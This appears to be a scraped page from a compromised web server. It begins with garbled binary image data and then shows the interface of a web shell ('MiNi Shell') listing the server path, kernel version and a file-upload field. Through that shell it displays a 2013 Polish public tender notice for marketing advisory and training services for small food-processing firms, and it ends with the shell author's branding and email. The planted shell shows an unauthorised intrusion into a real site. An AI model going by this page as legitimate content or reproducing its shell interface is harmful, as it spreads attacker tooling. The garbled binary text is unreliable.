JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130712/142289-N-2013.html

<p class="kh_header"><b>Bielsko-Biała: Wykonanie usług doradczo-szkoleniowych w ramach projektu pn. Przetestowanie i wdrożenie usługi pilotażowej w zakresie marketingu i sprzedaży produktów dla mikro- i małych przedsiębiorstw z branży przetwórstwa rolno-spożywczego, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach Poddziałania 2.2.1 Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 142289 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego S.A. , ul. Cieszyńska 365, 43-382 Bielsko-Biała, woj. śląskie, tel. 033 8122675, faks 033 8169162.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arrsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja Rozwoju Regionalnego SA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług doradczo-szkoleniowych w ramach projektu pn. Przetestowanie i wdrożenie usługi pilotażowej w zakresie marketingu i sprzedaży produktów dla mikro- i małych przedsiębiorstw z branży przetwórstwa rolno-spożywczego, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach Poddziałania 2.2.1 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa doradcza - pilotażowa będąca przedmiotem niniejszego postępowania jest skierowana do mikro i małych przedsiębiorstw działających w branży przetwórstwa rolno-spożywczego, prowadzących pozarolniczą działalność gospodarczą w oparciu o wpis do CEIDG lub KRS i będzie świadczona w ramach Krajowego Systemu Usług, zgodnie ze standardem opracowanym przez PARP.
Usługa obejmuje pozyskanie 33 firmy (mikro i małe przedsiębiorstwa)  działające w branży przetwórstwa rolno- spożywczego i realizację dwóch Komponentów: 
Komponent I - komponent doradczy podzielony na trzy etapy: 
1) Etap I: analiza sytuacji rynkowej firmy (audyt marketingowy), 
2)  Etap II: Doradztwo strategiczne - przygotowanie planu marketingowego, 
3)  Etap III: Asysta we wdrażaniu planu marketingowego
W ramach Etapu I - Wykonawca ma wykonać 33 audyty marketingowe w 33 firmach, działających w branży przetwórstwa rolno-spożywczego, 
W Etapu II - Wykonawca ma wykonać 25 planów marketingowych zgodnie ze standardem usługi. 
W Etapu III - Wykonawca ma wykonać 25 usług doradczych, zgodnie ze standardem usługi pilotażowej.

Komponent II - szkoleniowy 
Wykonanie Komponentu II -  będzie polegało na wykonaniu usługi szkoleniowej tj.  przeprowadzeniu przez doradców 3 szkoleń łącznie dla 35 firm z branży przetwórstwa rolno-spożywczego w zakresie marketingu i sprzedaży produktów dla mikro- i małych przedsiębiorstw, które zostały objęte usługą doradczą w zakresie komponentu I..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.20.00.00-4, 79.41.11.00-3, 79.41.11.00-9, 89.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 3.000,00 PLN (słownie: trzy tysiące złotych 00/100). 
Wadium należy wnieść w terminie do dnia 19.07.2013r.do godz. 9.00
Wadium może być wnoszone w formie zgodnej z  Ustawą PZP</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia i potwierdzenia spełnienia warunku, Wykonawca ma obowiązek złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu wynikające z art. 22 ust.1 ustawy, którego wzór stanowi wzór formularza, załącznik nr 3  do SIWZ. Ocena spełnienia powyższego warunku będzie dokonana metodą 0 - 1, tj. spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada wiedzę i doświadczenie polegającym na spełnienie niżej opisanych warunków wynikających ze standardu usługi pilotażowej:   
- wykonaniu w okresie 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, zrealizował co najmniej 20 usług doradczych z zakresu marketingu lub sprzedaży dla mikro- i małych przedsiębiorstw, w tym co najmniej 5 usług doradczych dla przedsiębiorstw działających w branży przetwórstwa rolno-spożywczego; 
- wykonaniu w ostatnich 5 latach swojej działalności zrealizował co najmniej 10 usług szkoleniowych z zakresu marketingu lub sprzedaży dla mikro- i małych przedsiębiorstw, w tym co najmniej 3 usług szkoleniowych dla przedsiębiorstw działających w branży przetwórstwa rolno-spożywczego; 

W celu oceny spełnienia powyższego warunku oraz w celu jego potwierdzenia, Wykonawca ma załączyć do oferty wykaz wykonanych usług doradczych i szkoleniowych  - w zakresach podanych powyżej. Wykaz należy sporządzić wg wzoru, który stanowi załącznik nr 4 do SIWZ. Dla potwierdzenia wykonania wymienionych w załączniku nr 4 usług, Zamawiający wymaga załączenia dokumentów potwierdzających ich wykonanie np. referencje, umowy,  protokóły zdawczo-odbiorcze lub oświadczenie Wykonawcy. Ocena spełnienia powyższego warunku będzie dokonana metodą 0 - 1, tj. spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia i potwierdzenia spełnienia warunku, Wykonawca ma obowiązek złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu wynikające z art. 22 ust.1 ustawy, którego wzór stanowi wzór formularza, załącznik nr  3  do SIWZ. Ocena spełnienia powyższego warunku będzie dokonana metodą 0 - 1, tj. spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje Zespołem 4 Doradców - Konsultantów tj. dysponuje 4 osobami, które spełniają poniżej opisane warunki, wynikające ze standardu świadczenia usługi pilotażowej opracowanej przez PARP oraz z wniosku aplikacyjnego, na podstawie, którego Zamawiający podpisał umowę z PARP o dofinansowanie działań będących przedmiotem niniejszego zamówienia.    

Opis sposobu dokonania  oceny spełnienia warunku:

Wykonawca, musi wykazać, że osoby, które będą realizować zamówienie wykażą się spełnieniem następujących warunków:

- wszystkie 4 osoby posiadają co najmniej wyższe wykształcenie kierunkowe, w tym co najmniej 2 osoby posiadają stopień naukowy (minimum doktorat) z zakresu nauk ekonomicznych.      

- wszystkie 4 osoby muszą spełniać warunki wymagane dla konsultantów świadczących usługi doradcze - ogólne w ramach Krajowego Systemu Usług (KSU),  określone na podstawie Rozporządzenia Ministra Gospodarki z dnia 24 maja 2011r. w sprawie Krajowego Systemu Usług  dla MSP. 

- co najmniej 3 osoby posiadają co najmniej trzyletnie, doświadczenie w świadczeniu usług doradczych w  zakresie audytu marketingowego lub planu marketingowego lub w zakresie równoważnym na rzecz mikro- lub małych przedsiębiorców tj. wykonały  10 takich  usług, w tym wykonały co najmniej 5 usług doradczych dla podmiotów z branży przetwórstwa rolno-spożywczego w ciągu  5 ostatnich lat. 

-  co najmniej 2 osoby posiadają co najmniej 2 letnie doświadczenie w realizacji usług doradczych w obszarze marketingu lub sprzedaży na rzeza mikro lub małych przedsiębiorców  zdobyte w ciągu ostatnich 5 lat  i wyświadczyły osobiście co najmniej 10 takich usług.

-  co najmniej 1 osoba posiada co najmniej trzyletnie doświadczenie jako doradca w zakresie analizy finansowej przedsiębiorstwa i wykonała minimum 10 takich analiz na rzecz mikro- lub małych przedsiębiorców lub osób fizycznych w ostatnich 5 latach.

-  co najmniej 3 osoby posiadają co najmniej trzyletnie, doświadczenie w prowadzeniu szkoleń, wykładów, warsztatów, seminariów, które przeprowadziły co najmniej po 10 szkoleń - każda osoba, dla przedsiębiorców z obszaru  marketingu lub sprzedaży, w tym co najmniej 1 osoba musi wykazać się przeprowadzeniem 3 szkoleń  dla  branży rolno-spożywczej w ostatnich 5 latach. 

  W celu potwierdzenia spełnienia w/w warunku, Wykonawca ma obowiązek załączyć do oferty:

-  wykaz osób przewidzianych do realizacji zamówienia -załącznika nr  5 do SIWZ 

-   CV każdego doradcy -konsultanta sporządzone wg. wzoru - załącznik nr 5 A do SIWZ;

-  oświadczenie każdego- doradcy- konsultanta o spełnieniu warunków w zakresie świadczenia usług doradczych lub potwierdzenie wpisania na listę konsultantów KSU; 

- wykaz wykonanych usług przez osoby (doradców- konsultantów) - wykazane w załączniku nr 5. Wykaz usług należy sporządzić wg wzoru stanowiącego załącznik nr 6 do SIWZ oraz należy do oferty dołączyć dokumenty potwierdzające wykonanie wymienionych usług, którymi mogą być: referencje lub umowy lub protokoły zdawczo - odbiorcze lub inne dokumenty lub oświadczenie konsultanta.
Ocena spełnienia powyższego warunku będzie dokonana metodą 0 - 1, tj. spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia i potwierdzenia spełnienia warunku, Wykonawca ma obowiązek złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu wynikające z art. 22 ust.1 ustawy, którego wzór stanowi wzór formularza, załącznik nr  3 do SIWZ.  Ocena spełnienia powyższego warunku będzie dokonana metodą 0 - 1, tj. spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Harmonogram - plan - wykonania zamówienia
Dokument potwirdzajacy wpisanie wykazanych w ofercie konsutlantów do KSU lub oświadczenie konsultantów o spełnieniu wymagań dla konsultantów KSU 
Wykaz wykonanych usług doradczych i szkoleniowych wykonanych przez wszystkich konsultantów w okresie ostatnich 5 lat (bez usług wymnienionych dla potwierdzenia warunków udziału w postępowania tj wykazanych w załączniku nr 4 i 6 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświdczenie w relizacji usług doradczych - 40</li>
<li>3 - Doświadczenie w realizacji usług szkoleniowych - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość zmiany umowy: tj. w przypadku wystąpienia okoliczności, których nie można było przewidzieć przed lub po podpisaniu umowy w wybranym Wykonawcą, wynikających z ewentualnych zmian wprowadzonych do umowy o pomiędzy Zamawiającym a PARP tj. przez Jednostkę Wdrażającą Projekt</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arrsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego S.A. 
ul. Cieszyńska 365
43 - 382 Bielsko-Biała.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2013 godzina 09:00, miejsce: Agencja Rozwoju Regionalnego S.A. 
ul. Cieszyńska 365
43 - 382 Bielsko-Biała
II piętro, sekretariat Biura Zarządu ARR S.A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonanie usług w zakresie przedmiotowego zamówienia realizowane w ramach projektu pn.Przetestowanie i wdrożenie usługi pilotażowej w zakresie marketingu i sprzedaży produktów dla mikro- i małych przedsiębiorstw z branży przetwórstwa rolno-spożywczego, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach Poddziałania 2.2.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com